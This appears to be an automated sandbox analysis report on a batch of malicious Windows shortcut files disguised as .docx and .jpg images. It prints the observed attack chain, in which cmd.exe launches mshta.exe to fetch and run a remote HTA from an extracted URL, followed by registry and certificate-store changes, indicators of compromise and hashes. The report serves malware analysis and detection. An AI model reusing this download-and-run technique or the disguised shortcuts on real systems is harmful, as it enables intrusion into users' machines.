Overview
overview
10Static
static
samples/As...cx.lnk
windows7_x64
10samples/As...cx.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/IM...pg.lnk
windows7_x64
10samples/IM...pg.lnk
windows10-2004_x64
10samples/Im...pg.lnk
windows7_x64
10samples/Im...pg.lnk
windows10-2004_x64
10Analysis
-
max time kernel
302s -
max time network
1219s -
platform
windows7_x64 -
resource
win7-20220311-en -
submitted
22-03-2022 12:37
Static task
static1
Behavioral task
behavioral1
Sample
samples/Assignment-Covid-19.docx.lnk
Resource
win7-20220311-en
Behavioral task
behavioral2
Sample
samples/Assignment-Covid-19.docx.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral3
Sample
samples/IMG20100510171450.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral4
Sample
samples/IMG20100510171450.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral5
Sample
samples/IMG20100510223001.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral6
Sample
samples/IMG20100510223001.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral7
Sample
samples/IMG20201210342791.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral8
Sample
samples/IMG20201210342791.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral9
Sample
samples/IMG20210588270623.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral10
Sample
samples/IMG20210588270623.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral11
Sample
samples/IMG20210713121548.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral12
Sample
samples/IMG20210713121548.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral13
Sample
samples/IMG20210743209813.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral14
Sample
samples/IMG20210743209813.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral15
Sample
samples/IMG20210911131002.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral16
Sample
samples/IMG20210911131002.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral17
Sample
samples/IMG20210918232755.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral18
Sample
samples/IMG20210918232755.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral19
Sample
samples/IMG_20201220_211940.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral20
Sample
samples/IMG_20201220_211940.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral21
Sample
samples/IMG_20210111_125841.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral22
Sample
samples/IMG_20210111_125841.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral23
Sample
samples/IMG_20210603_122317.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral24
Sample
samples/IMG_20210603_122317.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral25
Sample
samples/IMG_20210603_122331.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral26
Sample
samples/IMG_20210603_122331.jpg.lnk
Resource
win10v2004-20220310-en
Behavioral task
behavioral27
Sample
samples/IMG_20210628_105339.jpg.lnk
Resource
win7-20220311-en
Behavioral task
behavioral28
Sample
samples/IMG_20210628_105339.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral29
Sample
samples/IMG_20210628_160548.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral30
Sample
samples/IMG_20210628_160548.jpg.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral31
Sample
samples/Image-8646-ZP.jpg.lnk
Resource
win7-20220310-en
Behavioral task
behavioral32
Sample
samples/Image-8646-ZP.jpg.lnk
Resource
win10v2004-en-20220113
General
-
Target
samples/IMG_20210603_122331.jpg.lnk
Malware Config
Extracted
https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_122331
Signatures
-
Blocklisted process makes network request 11 IoCs
flow pid Process 5 432 mshta.exe 7 432 mshta.exe 9 432 mshta.exe 11 432 mshta.exe 13 432 mshta.exe 14 432 mshta.exe 15 432 mshta.exe 16 432 mshta.exe 17 432 mshta.exe 18 432 mshta.exe 17 432 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e mshta.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 432 mshta.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 808 wrote to memory of 432 808 cmd.exe 28 PID 808 wrote to memory of 432 808 cmd.exe 28 PID 808 wrote to memory of 432 808 cmd.exe 28 PID 432 wrote to memory of 912 432 mshta.exe 32 PID 432 wrote to memory of 912 432 mshta.exe 32 PID 432 wrote to memory of 912 432 mshta.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210603_122331.jpg.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210603_1223312⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" C:\ProgramData\Duolingo\windate.hta3⤵
- Modifies Internet Explorer settings
PID:912
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
652B
MD5df0ae835a1dc249c25f56c96a19c63c7
SHA1388bb0c49057b08a6fc5e7d4fcaab18754650c59
SHA2567838794872d83079d1a912e0201a76aff8b42404dde2117a5c57a3bb3310d1df
SHA512d4f538231d4c67407778dbfa6d825c53e59ce70e11a9d8add0e47ee248c0d8b5053285f197e9259af24898e15178a600f5bf852ef3a98258c61c9c67a9898aa8